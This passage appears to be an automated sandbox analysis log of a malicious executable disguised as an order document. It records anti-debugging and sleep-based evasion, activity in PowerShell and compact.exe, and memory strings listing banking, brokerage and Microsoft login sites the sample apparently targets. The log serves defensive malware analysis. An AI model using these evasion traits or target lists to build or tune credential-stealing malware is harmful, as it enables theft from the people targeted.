            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: AF90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: BF90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: D060000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: E060000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: F060000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Memory allocated: F760000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F096E rdtsc 5_2_013F096E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5097
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2162
            Source: C:\Windows\SysWOW64\compact.exe Window / User API: threadDelayed 3386
            Source: C:\Windows\SysWOW64\compact.exe Window / User API: threadDelayed 6586
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\compact.exe API coverage: 2.8 %
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe TID: 1280 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 528 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2632 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112 Thread sleep count: 3386 > 30
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112 Thread sleep time: -6772000s >= -30000s
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112 Thread sleep count: 6586 > 30
            Source: C:\Windows\SysWOW64\compact.exe TID: 5112 Thread sleep time: -13172000s >= -30000s
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888 Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888 Thread sleep time: -51000s >= -30000s
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\compact.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_02E2C170 FindFirstFileW,FindNextFileW,FindClose,10_2_02E2C170
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: N77o9w1836.10.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: N77o9w1836.10.dr Binary or memory string: discord.comVMware20,11696487552f
            Source: N77o9w1836.10.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: N77o9w1836.10.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: N77o9w1836.10.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: global block list test formVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: N77o9w1836.10.dr Binary or memory string: AMC password management pageVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: firefox.exe, 0000000E.00000002.2792349246.0000019DA522D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: N77o9w1836.10.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4569047335.00000000008EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: N77o9w1836.10.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: N77o9w1836.10.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq'Vh
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: N77o9w1836.10.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: N77o9w1836.10.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: N77o9w1836.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: N77o9w1836.10.dr Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: N77o9w1836.10.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: N77o9w1836.10.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: N77o9w1836.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: N77o9w1836.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: N77o9w1836.10.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\compact.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_00417B13 LdrLoadDll,5_2_00417B13
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_01444144 mov eax, dword ptr fs:[00000030h] 5_2_01444144
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C03E9 mov eax, dword ptr fs:[00000030h]5_2_013C03E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA3C0 mov eax, dword ptr fs:[00000030h]5_2_013BA3C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B83C0 mov eax, dword ptr fs:[00000030h]5_2_013B83C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01438243 mov eax, dword ptr fs:[00000030h]5_2_01438243
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01438243 mov ecx, dword ptr fs:[00000030h]5_2_01438243
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A823B mov eax, dword ptr fs:[00000030h]5_2_013A823B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A250 mov eax, dword ptr fs:[00000030h]5_2_0146A250
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A250 mov eax, dword ptr fs:[00000030h]5_2_0146A250
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460274 mov eax, dword ptr fs:[00000030h]5_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A826B mov eax, dword ptr fs:[00000030h]5_2_013A826B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4260 mov eax, dword ptr fs:[00000030h]5_2_013B4260
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4260 mov eax, dword ptr fs:[00000030h]5_2_013B4260
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B4260 mov eax, dword ptr fs:[00000030h]5_2_013B4260
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B6259 mov eax, dword ptr fs:[00000030h]5_2_013B6259
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AA250 mov eax, dword ptr fs:[00000030h]5_2_013AA250
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE284 mov eax, dword ptr fs:[00000030h]5_2_013EE284
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE284 mov eax, dword ptr fs:[00000030h]5_2_013EE284
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430283 mov eax, dword ptr fs:[00000030h]5_2_01430283
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430283 mov eax, dword ptr fs:[00000030h]5_2_01430283
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01430283 mov eax, dword ptr fs:[00000030h]5_2_01430283
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C02E1 mov eax, dword ptr fs:[00000030h]5_2_013C02E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C02E1 mov eax, dword ptr fs:[00000030h]5_2_013C02E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C02E1 mov eax, dword ptr fs:[00000030h]5_2_013C02E1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov ecx, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014462A0 mov eax, dword ptr fs:[00000030h]5_2_014462A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BA2C3 mov eax, dword ptr fs:[00000030h]5_2_013BA2C3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE53E mov eax, dword ptr fs:[00000030h]5_2_013DE53E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0535 mov eax, dword ptr fs:[00000030h]5_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01446500 mov eax, dword ptr fs:[00000030h]5_2_01446500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01484500 mov eax, dword ptr fs:[00000030h]5_2_01484500
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E656A mov eax, dword ptr fs:[00000030h]5_2_013E656A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E656A mov eax, dword ptr fs:[00000030h]5_2_013E656A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E656A mov eax, dword ptr fs:[00000030h]5_2_013E656A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8550 mov eax, dword ptr fs:[00000030h]5_2_013B8550
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B8550 mov eax, dword ptr fs:[00000030h]5_2_013B8550
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D45B1 mov eax, dword ptr fs:[00000030h]5_2_013D45B1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D45B1 mov eax, dword ptr fs:[00000030h]5_2_013D45B1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE59C mov eax, dword ptr fs:[00000030h]5_2_013EE59C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E4588 mov eax, dword ptr fs:[00000030h]5_2_013E4588
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B2582 mov eax, dword ptr fs:[00000030h]5_2_013B2582
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B2582 mov ecx, dword ptr fs:[00000030h]5_2_013B2582
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC5ED mov eax, dword ptr fs:[00000030h]5_2_013EC5ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EC5ED mov eax, dword ptr fs:[00000030h]5_2_013EC5ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DE5E7 mov eax, dword ptr fs:[00000030h]5_2_013DE5E7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B25E0 mov eax, dword ptr fs:[00000030h]5_2_013B25E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014305A7 mov eax, dword ptr fs:[00000030h]5_2_014305A7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014305A7 mov eax, dword ptr fs:[00000030h]5_2_014305A7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014305A7 mov eax, dword ptr fs:[00000030h]5_2_014305A7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B65D0 mov eax, dword ptr fs:[00000030h]5_2_013B65D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA5D0 mov eax, dword ptr fs:[00000030h]5_2_013EA5D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA5D0 mov eax, dword ptr fs:[00000030h]5_2_013EA5D0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE5CF mov eax, dword ptr fs:[00000030h]5_2_013EE5CF
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE5CF mov eax, dword ptr fs:[00000030h]5_2_013EE5CF
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EA430 mov eax, dword ptr fs:[00000030h]5_2_013EA430
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146A456 mov eax, dword ptr fs:[00000030h]5_2_0146A456
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE420 mov eax, dword ptr fs:[00000030h]5_2_013AE420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE420 mov eax, dword ptr fs:[00000030h]5_2_013AE420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AE420 mov eax, dword ptr fs:[00000030h]5_2_013AE420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AC427 mov eax, dword ptr fs:[00000030h]5_2_013AC427
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143C460 mov ecx, dword ptr fs:[00000030h]5_2_0143C460
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8402 mov eax, dword ptr fs:[00000030h]5_2_013E8402
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8402 mov eax, dword ptr fs:[00000030h]5_2_013E8402
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E8402 mov eax, dword ptr fs:[00000030h]5_2_013E8402
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DA470 mov eax, dword ptr fs:[00000030h]5_2_013DA470
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DA470 mov eax, dword ptr fs:[00000030h]5_2_013DA470
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DA470 mov eax, dword ptr fs:[00000030h]5_2_013DA470
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01436420 mov eax, dword ptr fs:[00000030h]5_2_01436420
